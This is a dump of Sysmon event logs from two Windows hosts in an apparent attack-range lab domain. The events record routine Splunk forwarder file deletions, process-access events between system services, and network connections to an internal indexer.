SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=38468ACF9D265688166FA9E0834A4482,SHA256=EA7BE47DD6915BC131B8EDFC50AF2989AAF5583B8DCF3A40A5BDD819223B37BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:38.353{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E8B7B787C2DB98A0F1CC957481FDF5F,SHA256=DEF928A796213F9CE760A6422862C0754D0D602ED445A4A82CB36EC64A660B49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:39.842{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBE4311494E91710050E21BDD60B7FD3,SHA256=FD0E77611167AA90F20F9DBFE4FEA2F276CCBFBF5C9ECDBAEC737F968440F170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:39.368{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BF131572B8CC080FB71A24C8765CD18,SHA256=5102BADC1C2B79CE81A3E8BF8C010171A5089C086C26C9D98B200EC0F54634A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:40.857{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE259EBEBA8D9D7D5CC2F4B30A346D56,SHA256=5B7C724E76971CB6A35C92AA24D810EF0555B7F2233D636F9C224E26303E0756,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:40.383{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCFF7BC043A8456DA8C22553847CC109,SHA256=478951A809DBB70A8574F5E7EC43AD2C15D41B18BEAE34A6386338EBD53008F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:39.255{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57347-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:41.873{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72A0DD5E2406BC2513FD1EC363E816B9,SHA256=56F85BE1810C47E65A8CC7FE6923ACAC12F01DB7341F92B7E66EAD66B7524526,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:41.467{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:41.467{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:41.467{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:41.400{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0A9E1CE5C75474F9F6B62157E7070B1,SHA256=A545EC329C75C9855B599DFA6E46985A6919923FFA27DB08642D0F0C4882B910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:42.904{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CD4ED1AF2414DE7709D253AE8F17EA1,SHA256=FDF56DC6DCAED228AD14491A04E428D87225EAEF5CBC06B2119B3F4CF52EC066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:42.420{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6B61AA834093479FA88BE45DE776728,SHA256=8CCA8C50A264BDE21D95E07626D952B2EBB953C6B208455636467915775CC186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:43.904{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE4372E8E92A8ED6CA7EF4A8FB190AA9,SHA256=15E880ACE7A07FAA1FA178520C921B53A59F466EC041A1B18E55A74DCD2B9531,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:43.436{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BEA720FE5189BE46EE8EF3B330A0341,SHA256=5325EB53E66A935F28EF7F99797AB6EA54A9F8FFF93FF106D77C19C11D54196F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:44.951{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06F1D16F22F16C68A04D49F75F412411,SHA256=074D70492E158306C1BA320FF1DD00DF3ABE2153ECD3E815FE7BA300431A2CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:44.465{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B7282215D77545A48594F7A055F7F09,SHA256=1C44BCBA7E4786A3AA01E5E6507B9319C2753EBF2C5BAA642EBDF1A6DD958955,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:35.687{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51114-false10.0.1.12-8000- 23542300x8000000000000000808759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:45.967{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EFEA41792EEFF4F93C0DD0C0CA751D2,SHA256=1AB0C8AE29877D9A45D3B92DE9CDEAD5AC081B626161495A4AD392B487A88159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:45.466{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E3A091DAAAD1569FB6CA7676DCD0DDF,SHA256=A76925A44A01E1EED951A0E9DC52CA0871610D73FDB3570CAEB89DC7DF671D75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:46.967{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FDBB492EF1840A2274DAE1F76827794,SHA256=15257E81E0F2790A60FAD8ECA05A0302668863CF8698F4A81A623CDE60123F5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.500{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=764F25650C5DAEC6260884581607189D,SHA256=275749B43D83C8FAC3DA8AA6162CEBF59D9F09E6B1A733ABF715FD264C186764,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:45.209{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57348-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:47.967{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9132039A9DAC5DF9572A83F7B03E91C2,SHA256=616C847BD80AED481A1FE46E82526E522185FE30C828846886148CB5B482EFAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:47.517{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF23A9D80F2D0795EC2073BD56BA3897,SHA256=9D69342BEED6B2579D6790E547B6D61F49D6BEB4E2F50EDF9D31A9398DED621F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:48.967{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B39AC92B8B781D62DCD809BF441F1D9,SHA256=8F8C22219FC532293E8C9E269AC9A69F1ACF01AE6ED16FA572A44A91EC0A3D61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:48.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D569391E5252754B8BCB6A3F550B093,SHA256=C9DEA6EA517DE8CD93DB837BFEBCE35B2BCAE68AA9A6FE25B73D83A885F65BFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:49.982{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93C934AE8D13F1E678FAAB46D408EFDC,SHA256=3FA3B99DE90659AB170B425784A5185D68456AF9523AD7E85C61C58014F2CC72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:49.547{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D21FA6E95304A22AE956235EC8E9C756,SHA256=9BD68283B456BAF54B74F5CA60C2FDAA6C85612BE953058FDFDCA1B03431C1C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:50.982{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2C21CD22A37709602336D5EE8F03DBE,SHA256=948492AA00549D4BF074C65A84AC9C3ABE41A9B28A7DED80AE1BDAAF1BBFABC5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63A-60EB-937D-00000000CF01}10028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F63A-60EB-937D-00000000CF01}10028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63A-60EB-937D-00000000CF01}10028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.906{466BC892-F63A-60EB-937D-00000000CF01}10028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.711{466BC892-F63A-60EB-927D-00000000CF01}99164384C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.574{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A203269C0CD3CF127AE855F56CBE734B,SHA256=4291E3E3DD81B3C86AFE3422C428FC12964DF8F39C3A2A9C34745AD67621ACCA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 